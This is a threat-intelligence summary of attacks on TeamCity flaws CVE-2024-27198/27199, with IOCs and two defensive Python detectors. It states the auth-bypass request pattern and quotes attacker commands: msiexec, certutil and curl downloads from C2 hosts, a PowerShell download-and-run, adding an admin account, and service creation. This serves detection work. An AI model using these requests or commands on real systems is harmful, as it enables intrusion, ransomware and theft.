TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

Two critical vulnerabilities in JetBrains TeamCity On-Premises (CVE-2024-27198 and CVE-2024-27199) enable authentication bypass and remote code execution on vulnerable servers, and public proof-of-concept exploits are widely available. Active exploitation has resulted in deployment of payloads including Jasmin ransomware, XMRig miner, SparkRAT backdoor, and Cobalt Strike beacons; CISA has added CVE-2024-27198 to its Known Exploited Vulnerabilities catalog. #Jasmin #XMRig #SparkRAT #CobaltStrike #TeamCity

Keypoints

  • CVE-2024-27198 is a critical authentication bypass (RCE) in TeamCity’s web component; CVE-2024-27199 is a directory traversal leading to authentication bypass and information leakage.
  • Exploitation conditions for CVE-2024-27198 include generating an unauthenticated 404 response, using the query string “?jsp=/app/rest/server”, and appending “;.jsp” to the path parameter.
  • Directory traversal via CVE-2024-27199 affects paths such as /res/, /update/, and /.well-known/acme-challenge/.
  • Observed post-exploitation activity includes MSI downloads via msiexec to drop payloads: Jasmin ransomware (renames files to .lsoc), XMRig miner (JavaAccessBridge-64.exe + WinRing0x64.sys + config.json), and SparkRAT via certutil and bat scripts.
  • Attackers used multistage chains leveraging living-off-the-land binaries (msiexec, certutil, curl, powershell) to retrieve and execute payloads and to create persistence (sc create) and manipulate accounts (net/net1 commands).
  • Cobalt Strike beacons were also delivered (downloaded with curl and saved to C:\TeamCity\*.conf), contacting known C2 servers observed in telemetry.
  • Trend detections and rules (TippingPoint, Trend Vision One, DDI) were published to identify exploit responses and malicious payload activity.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access to TeamCity by bypassing authentication via CVE-2024-27198/CVE-2024-27199 (‘allow attackers to bypass authentication measures and gain administrative control over affected servers.’)
  • [T1059.001] PowerShell – Employed to download and execute payloads on compromised servers (‘powershell -ep bypass IEX (New-Object System.Net.Webclient).DownloadFile(…)’).
  • [T1140] De-obfuscate/Decode Files or Information – Used by attackers to obfuscate ransom note and decode components (ransom note ‘obfuscated and used JavaScript to generate the ransom note text’).
  • [T1087] Account Discovery – Attackers ran account enumeration commands from the TeamCity process (‘C:\WINDOWS\system32\net.exe group /domain’).
  • [T1482] Domain Trust Discovery – Used nltest to enumerate domain trusts during discovery (‘C:\WINDOWS\system32\nltest.exe /domain_trusts’).
  • [T1105] Ingress Tool Transfer – MSI and other payloads were fetched via HTTP (msiexec used to install hxxp://…/ABC.msi and similar URLs).
  • [T1041] Exfiltration Over C2 Channel – Malicious beacons reached out to C2 servers to receive commands (‘The beacon reaches out to the C&C server 83[.]97[.]20[.]141’).
  • [T1486] Data Encrypted for Impact – Ransomware encrypted files and renamed them with the .lsoc extension and dropped a ransom note (‘rename files with the extension .lsoc and drop a ransom note’).

Indicators of Compromise

  • [IP addresses] Payload/C2 hosts observed – 207[.]246[.]102[.]242:56641 (MSI host), 146[.]70[.]149[.]185:58090 (miner MSI), and other C2s such as 38[.]54[.]94[.]13 and 83[.]97[.]20[.]141.
  • [File hashes] Observed payload hashes – SHA256: 56942b36d5990f66a81955a94511298fd27cb6092e467110a7995a0654f17b1a (ABC.msi), SHA256: 32a630decb8fcc8a7ed4811f4293b9d5a242ce7865ab10c19a16fc4aa384bf64 (dropped PE), and 3 more hashes.
  • [File names] Dropped binaries and artifacts – JavaAccessBridge-64.exe, WinRing0x64.sys (miner driver), un-lock your files.html (ransom note).
  • [URLs/Download paths] Example download endpoints – hxxp://207[.]246[.]102[.]242:56641/ABC.msi, hxxp://146[.]70[.]149[.]185:58090/JavaAccessBridge-64.msi, hxxp://38[.]54[.]94[.]13:8080/86.dat.
  • [C2 servers] Command servers linked to payloads – 38[.]54[.]94[.]13 (SparkRAT), 83[.]97[.]20[.]141 (Cobeacon/Cobalt Strike beacon).

To exploit CVE-2024-27198, attackers trigger an unauthenticated 404 response, add the query string ?jsp=/app/rest/server, and append “;.jsp” to the path parameter, which bypasses TeamCity web authentication and enables remote code execution. CVE-2024-27199 allows directory traversal (affecting paths such as /res/, /update/, and /.well-known/acme-challenge/) that can leak information and help bypass authentication. Exploitation chains observed in telemetry use TeamCity’s java.exe to spawn cmd.exe and run msiexec to fetch MSI installers (e.g., ABC.msi or JavaAccessBridge-64.msi) that drop and execute payloads.
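The request patterns described above give defenders something concrete to hunt for in TeamCity's HTTP access logs: a path-parameter suffix of ";.jsp" combined with a jsp= query value pointing into /app/rest, and dot-dot traversal under the three affected prefixes. The scanner below is an added example (not code from the report or from JetBrains); the log lines are constructed, the Common Log Format regex is an assumption about how your reverse proxy logs requests, and it generalises the page's single /app/rest/server case to any jsp= value that targets the REST API.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines; none of these are from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /app/rest/server HTTP/1.1" 401 0
10.0.0.7 - - [10/Mar/2024:12:00:02 +0000] "POST /hax;.jsp?jsp=/app/rest/server HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 2048
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /.well-known/acme-challenge/..%2F..%2Fadmin/diagnostic.jsp HTTP/1.1" 200 2048
10.0.0.3 - - [10/Mar/2024:12:00:05 +0000] "GET /update/notes.txt HTTP/1.1" 200 10
10.0.0.3 - - [10/Mar/2024:12:00:06 +0000] "GET /login.html HTTP/1.1" 200 4096
"""

# Assumed log shape: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Path prefixes the report names as affected by the CVE-2024-27199 traversal.
TRAVERSAL_PREFIXES = ("/res/", "/update/", "/.well-known/acme-challenge/")


def classify_request(target):
    """Label one request target (path plus query) with the pattern it matches, or None."""
    parts = urlsplit(target)
    # Decode twice so single- and double-URL-encoded sequences are both visible.
    decoded = unquote(unquote(parts.path))
    query = parse_qs(parts.query)

    # CVE-2024-27198 pattern: ";.jsp" path parameter plus a jsp= value into the REST API.
    jsp_values = query.get("jsp", [])
    if ";.jsp" in decoded and any(v.startswith("/app/rest") for v in jsp_values):
        return "CVE-2024-27198-pattern"

    # CVE-2024-27199 pattern: dot-dot traversal beneath one of the affected prefixes.
    if decoded.startswith(TRAVERSAL_PREFIXES) and ".." in decoded:
        return "CVE-2024-27199-pattern"
    return None


def scan_access_log(text):
    """Return one dict per log line whose request target matches either pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log shape
        label = classify_request(m.group("target"))
        if label:
            hits.append({"ip": m.group("ip"), "target": m.group("target"),
                         "status": int(m.group("status")), "pattern": label})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the interesting case: the report's bypass depends on the server answering the disguised request as an authenticated one, so a matching target that returned 401 or 404 is most likely a scanner probe against a patched host, while a 200 deserves a look at what the TeamCity process did next.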

Post-exploitation follows a multistage, LOLBin-heavy workflow: msiexec downloads MSI packages that unpack payloads (ransomware PE or XMRig binaries plus components such as config.json and WinRing0x64.sys); certutil is used to decode or retrieve binaries (certutil -urlcache -split -f …); PowerShell with -ep bypass or direct cmd invocations execute bat scripts that create services (sc create windowDefenSrv …) and establish persistence. SparkRAT was installed via a win.bat that uses certutil to fetch public.dat and starts it, while XMRig uses the dropped WinRing0x64.sys driver to access MSRs for mining when required.

Attackers also run discovery and privilege escalation commands from the compromised TeamCity process (examples: net group /domain, net1 localgroup Administrators /add Default$, nltest /domain_trusts) and fetch remote beacons via curl (e.g., curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf) to deploy Cobalt Strike beacons. Defenders should watch for msiexec, certutil, suspicious msf/curl downloads, .lsoc file renames, and creation of unexpected services and scheduled items under TeamCity process ancestry.
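The two post-exploitation paragraphs above describe a chain that is easiest to catch by process ancestry: TeamCity's java.exe should not normally be an ancestor of msiexec fetching a remote MSI, certutil with -urlcache, curl writing a file, sc create, net/net1 account changes or nltest trust enumeration. The detector below is an added example (not the report's or Trend Micro's code); the process-creation events are constructed JSON lines with an assumed pid/ppid/image/cmdline schema, the MSI URL is a placeholder, and the ancestry gate can be switched off to see how much noise it removes.

```python
import json
import re
from os.path import basename

# Constructed process-creation events modelled on the chain the report describes
# (TeamCity java.exe -> cmd.exe -> LOLBin). Not real telemetry; the URL is a placeholder.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1,   "image": "C:\\Windows\\System32\\services.exe", "cmdline": "services.exe"}
{"pid": 200, "ppid": 100, "image": "C:\\TeamCity\\jre\\bin\\java.exe", "cmdline": "java.exe -jar TeamCity"}
{"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c msiexec /q /i http://PLACEHOLDER.example/ABC.msi"}
{"pid": 301, "ppid": 300, "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec /q /i http://PLACEHOLDER.example/ABC.msi"}
{"pid": 302, "ppid": 200, "image": "C:\\Windows\\System32\\net1.exe", "cmdline": "net1 localgroup Administrators /add Default$"}
{"pid": 303, "ppid": 200, "image": "C:\\Windows\\System32\\nltest.exe", "cmdline": "nltest /domain_trusts"}
{"pid": 304, "ppid": 200, "image": "C:\\Windows\\System32\\sc.exe", "cmdline": "sc create windowDefenSrv binPath= C:\\ProgramData\\svc.exe"}
{"pid": 400, "ppid": 1,   "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c certutil -urlcache -split -f http://intranet.example/update.exe"}
{"pid": 401, "ppid": 400, "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil -urlcache -split -f http://intranet.example/update.exe"}
"""

# Command-line patterns per LOLBin, taken from the behaviours listed in the report.
ACCOUNT_RE = re.compile(r"\s(group\s+/domain|localgroup\s+.*\s/add)", re.I)
LOLBIN_RULES = {
    "msiexec.exe": re.compile(r"https?://", re.I),            # remote MSI install
    "certutil.exe": re.compile(r"-urlcache", re.I),           # download via certutil
    "curl.exe": re.compile(r"https?://.*\s-o\s", re.I),       # beacon download to disk
    "powershell.exe": re.compile(r"-ep\s+bypass", re.I),      # execution-policy bypass
    "sc.exe": re.compile(r"^\S*sc(\.exe)?\s+create\b", re.I), # service persistence
    "net.exe": ACCOUNT_RE,                                    # account discovery/manipulation
    "net1.exe": ACCOUNT_RE,
    "nltest.exe": re.compile(r"/domain_trusts", re.I),        # domain trust discovery
}


def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_teamcity_java(event):
    image = event["image"].lower()
    return image.endswith("java.exe") and "teamcity" in image


def has_teamcity_ancestor(event, by_pid, max_depth=16):
    """Walk the parent chain (bounded, in case of pid reuse loops) looking for TeamCity's java.exe."""
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return False
        if is_teamcity_java(parent):
            return True
        cur = parent
    return False


def find_suspicious(events, require_teamcity_ancestry=True):
    """Return (pid, cmdline) for LOLBin launches matching a rule, optionally gated on ancestry."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        exe = basename(e["image"].replace("\\", "/")).lower()  # Windows path, POSIX basename
        rule = LOLBIN_RULES.get(exe)
        if rule is None or not rule.search(e["cmdline"]):
            continue
        if require_teamcity_ancestry and not has_teamcity_ancestor(e, by_pid):
            continue
        hits.append((e["pid"], e["cmdline"]))
    return hits


if __name__ == "__main__":
    for pid, cmdline in find_suspicious(load_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {cmdline}")
```

Rules are keyed on the image name of the process that actually runs, so the cmd.exe wrapper that merely carries "msiexec ... http://" in its command line does not produce a duplicate alert. The certutil download under an ordinary cmd.exe is dropped by the ancestry gate and only surfaces when the gate is off, which is the trade-off to make explicitly: a build server legitimately fetches things, but not from a shell spawned by its own web process. Pairing this with file-rename telemetry for the .lsoc extension covers the ransomware stage the report describes.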

Read more: https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html